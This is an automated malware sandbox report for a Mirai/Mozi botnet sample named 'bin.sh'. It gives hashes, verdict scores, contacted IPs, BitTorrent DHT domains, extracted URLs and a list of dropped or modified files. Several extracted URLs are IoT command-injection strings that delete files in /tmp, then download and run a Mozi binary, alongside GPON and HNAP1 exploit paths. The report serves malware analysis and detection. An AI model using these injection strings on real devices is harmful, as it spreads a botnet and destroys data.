We are hiring! Windows Kernel Developer (Remote), apply here!
flash

bin.sh

Status: finished
Submission Time: 2021-11-16 15:39:16 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    522924
  • API (Web) ID:
    890454
  • Analysis Started:
    2021-11-16 15:43:38 +01:00
  • Analysis Finished:
    2021-11-16 15:52:17 +01:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

malicious
100/100

malicious
20/37

malicious
21/28

malicious

IPs

IP Country Detection
210.124.201.174
Korea Republic of
193.158.229.141
Germany
90.69.78.230
France
Click to see the 97 hidden entries
37.183.225.87
Italy
170.50.42.161
United States
223.68.174.98
China
100.247.223.10
United States
184.208.244.4
United States
191.195.251.222
Brazil
185.199.7.63
Russian Federation
26.170.22.231
United States
123.222.206.245
Japan
144.181.223.184
Norway
76.212.164.182
United States
17.132.17.181
United States
145.232.209.196
Switzerland
213.252.178.60
Germany
98.210.30.71
United States
70.112.192.65
United States
46.4.218.5
Germany
200.5.135.104
Venezuela
119.4.226.185
China
24.91.81.168
United States
94.141.229.241
Russian Federation
102.5.14.36
unknown
164.65.9.101
United States
139.175.26.151
Taiwan; Republic of China (ROC)
165.136.72.146
United States
211.77.127.153
Taiwan; Republic of China (ROC)
124.93.117.153
China
174.125.112.165
United States
104.217.29.14
United States
115.129.103.88
Australia
74.59.149.216
Canada
96.220.84.8
United States
201.253.51.131
Argentina
192.242.78.25
United States
106.202.19.20
India
38.158.59.90
United States
174.176.240.91
United States
75.150.131.245
United States
68.65.138.36
United States
194.181.5.184
Poland
154.32.220.46
United Kingdom
186.110.45.252
Argentina
176.190.90.3
France
110.161.16.195
Japan
73.44.243.3
United States
188.50.35.239
Saudi Arabia
82.222.206.85
Turkey
114.245.131.177
China
125.68.189.12
China
53.49.108.194
Germany
69.91.47.228
United States
187.11.37.82
Brazil
174.111.86.95
United States
77.72.157.219
Netherlands
193.48.239.12
France
4.252.44.159
United States
76.217.46.172
United States
166.65.80.38
New Zealand
97.109.239.27
Canada
221.136.35.240
China
98.80.130.179
United States
118.241.131.48
Japan
27.219.31.91
China
147.239.8.164
United States
84.216.74.60
Sweden
197.103.198.60
South Africa
221.121.67.245
Australia
172.47.177.11
United States
203.76.80.94
Japan
85.44.173.79
Italy
195.142.249.103
Turkey
22.89.26.204
United States
16.21.94.155
United States
105.152.92.179
Morocco
39.58.236.135
Pakistan
120.26.205.75
China
212.58.38.181
United Kingdom
217.198.0.163
Russian Federation
86.66.84.251
France
122.145.165.234
Japan
145.200.155.76
Netherlands
59.192.38.107
China
133.60.186.200
Japan
181.65.68.78
Peru
63.89.240.37
United States
94.203.207.167
United Arab Emirates
86.125.111.1
Romania
175.210.60.254
Korea Republic of
147.45.243.245
Russian Federation
67.194.169.78
United States
163.55.185.59
Japan
88.117.139.76
Austria
163.136.89.118
Japan
135.114.116.178
United States
67.154.225.218
United States
168.122.210.178
United States
105.87.139.22
Egypt

Domains

Name IP Detection
dht.transmissionbt.com
87.98.162.88
bttracker.acc.umu.se
130.239.18.158
router.bittorrent.com
67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com
82.221.103.244
bttracker.debian.org
0.0.0.0

URLs

Name Detection
http://175.119.69.229:80/HNAP1/
http://112.74.206.52:80/HNAP1/
http://221.128.175.114:80/HNAP1/
Click to see the 34 hidden entries
http://52.54.104.1:80/HNAP1/
http://%s:%d/bin.sh
http://201.49.41.72:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://3.113.149.148:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://216.180.103.7:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://%s:%d/bin.sh;chmod
http://122.201.116.141:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://HTTP/1.1
http://%s:%d/Mozi.a;sh$
http://www.pastebin.ca.
http://www.alsa-project.org.
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh
http://purenetworks.com/HNAP1/
http://www.pastebin.ca
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://127.0.0.1sendcmd
http://ipinfo.io/ip
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/cardinfo-db/
http://%s:%d/Mozi.m
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://schemas.xmlsoap.org/soap/envelope/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d/Mozi.a;chmod
http://pastebin.ca)

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountall.sh
ASCII text
#
/usr/bin/gettext.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/rc.local
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/init.d/umountnfs.sh
ASCII text
#
/etc/init.d/mountnfs.sh
ASCII text
#
/etc/init.d/mountnfs-bootclean.sh
ASCII text
#
/etc/init.d/mountkernfs.sh
ASCII text
#
/etc/init.d/mountdevsubfs.sh
ASCII text
#
/etc/init.d/mountall-bootclean.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/hostname.sh
ASCII text
#
/etc/init.d/checkroot.sh
ASCII text
#
/etc/init.d/checkroot-bootclean.sh
ASCII text
#
/etc/init.d/checkfs.sh
ASCII text
#
/etc/init.d/bootmisc.sh
ASCII text
#
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/tmp/.config
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/etc/bash_completion.d/libreoffice.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/powerbtn.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/boot/grub/i386-pc/modinfo.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#